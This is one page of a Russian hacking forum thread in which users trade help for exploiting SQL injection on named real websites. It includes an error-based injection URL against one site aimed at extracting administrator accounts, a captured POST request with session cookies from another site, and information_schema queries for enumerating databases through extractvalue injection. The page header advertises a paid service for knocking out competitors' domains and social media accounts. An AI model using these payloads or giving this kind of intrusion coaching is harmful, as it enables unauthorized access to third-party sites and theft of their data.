Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 64 из 296

Опции темы

Поиск в этой теме

Опции просмотра

#631

06.10.2015, 02:29

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

С нами: 8417113

Репутация: 0

Полный список всех методов обхода сейчас приведен здесь: https://rdot.org/forum/showthread.php?t=2860 (5: group_concat, benchmark, @, insert, replace).

Наиболее удобный в стандартной ситуации способ - 3.

#632

06.10.2015, 17:14

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

http://mariin.ru/index.php?q=12'

www.mariin.ru/index.php?p=forum&action=getfile'OR/**/(SELECT+COUNT(*)/**/FROM/**/(SELECT+1/**/UNION/**/SELECT+2/**/UNION/**/SELECT+3)x/**/GROUP/**/BY/**/CONCAT(MID((select/**/user()),+1,+63),+FLOOR(RAND(0)*2)))/*

Нужно узнать префикс таблиц, чтоб вытащить админов. cms дырявая, но 4 версия mysql всему мешает. Рес оч нужный, прошу помоч)

PROCEDURE ANALYSE() заиспользовать не получилось, мб не правильно делаю

#633

07.10.2015, 02:30

Shubka75

Познающий

Регистрация: 24.09.2015

Сообщений: 35

С нами: 5598326

Репутация: 30

Цитата:

Сообщение от vikler

↑

Код:

http://mmp.nl/openfoto.asp?foto=453096142 AND 1=1&Weergave=Liggend&tabel=sportbeelden

Не могу вытащить ничего sqlmap'ом - Oracle вроде как но
[ERROR] unable to retrieve the number of databases

Там не Oracle, а Microsoft Access.

#634

07.10.2015, 13:46

Valer4ik

Новичок

Регистрация: 25.07.2015

Сообщений: 7

С нами: 5686166

Репутация: 0

Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,

справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,

если запрос повторить, вылазит ошибка.

MySql error: Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'

query: INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')

POST /apatity/business-internet/ HTTP/1.1

Host: karelia.pro

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://karelia.pro/apatity/business-internet/

Cookie: __utma=86736642.1434525950.1444154760.1444207012.1 444209648.5; __utmz=86736642.1444154760.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); PHPSESSID=bc74f0fe64381cab78e74ac0e4d67963; __utmb=86736642.2.10.1444209648; __utmc=86736642; __utmt=1

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 140

name=%C8%ED%ED%E0&city=%C0%EF%E0%F2%E8%F2%FB&stree t=%CC%FB%EB%EA%E0&house=65&FIO=%C3%F0%F3%F8%E5%E2% F1%EA%E0%FF&phone=3336324&info=&send=%A0

не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только

false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.

Можно это как то раскрутить?

#635

07.10.2015, 16:14

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Привет. Подскажите пожалуйста про UDF-injection . Как понять "пользовательские функции"

и по реализации. какие отличия, минусы, плюсы. Спасибо.

#636

07.10.2015, 16:18

grimnir

Познавший АНТИЧАТ

Регистрация: 23.04.2012

Сообщений: 1,109

С нами: 7396886

Репутация: 231

Цитата:

Сообщение от BabaDook

↑
Привет. Подскажите пожалуйста про UDF-injection . Как понять "пользовательские функции"
и по реализации. какие отличия, минусы, плюсы. Спасибо.

http://kaoticcreations.blogspot.com/...m-root-to.html

http://kaoticcreations.blogspot.com/...oot-to_19.html

#637

09.10.2015, 07:21

AlexG

Познающий

Регистрация: 26.09.2015

Сообщений: 56

С нами: 5595446

Репутация: 5

Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -

Код:

extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))

для работы с другими базами (как перебрать имена всех баз)?

#638

09.10.2015, 09:12

qaz

Познавший АНТИЧАТ

Регистрация: 12.07.2010

Сообщений: 1,546

С нами: 8334326

Репутация: 75

Цитата:

Сообщение от AlexG

↑
для работы с другими базами (как перебрать имена всех баз)?

select table_schema from information_schema.tables limit 1,1

#639

09.10.2015, 09:54

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

С нами: 8469890

Репутация: 0

Цитата:

Сообщение от AlexG

↑
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -

Код:

extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))

для работы с другими базами (как перебрать имена всех баз)?

select schema_name from information_schema.schemata limit 0,1

#640

09.10.2015, 12:16

Waki

Познающий

Регистрация: 09.10.2015

Сообщений: 54

С нами: 5576726

Репутация: 10

нашел blind sql, но при проверки привилегий показывает USAGE, можно только дамп или есть еще варианты?

Страница 64 из 296

Предыдущая тема Следующая тема

Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)

Быстрый переход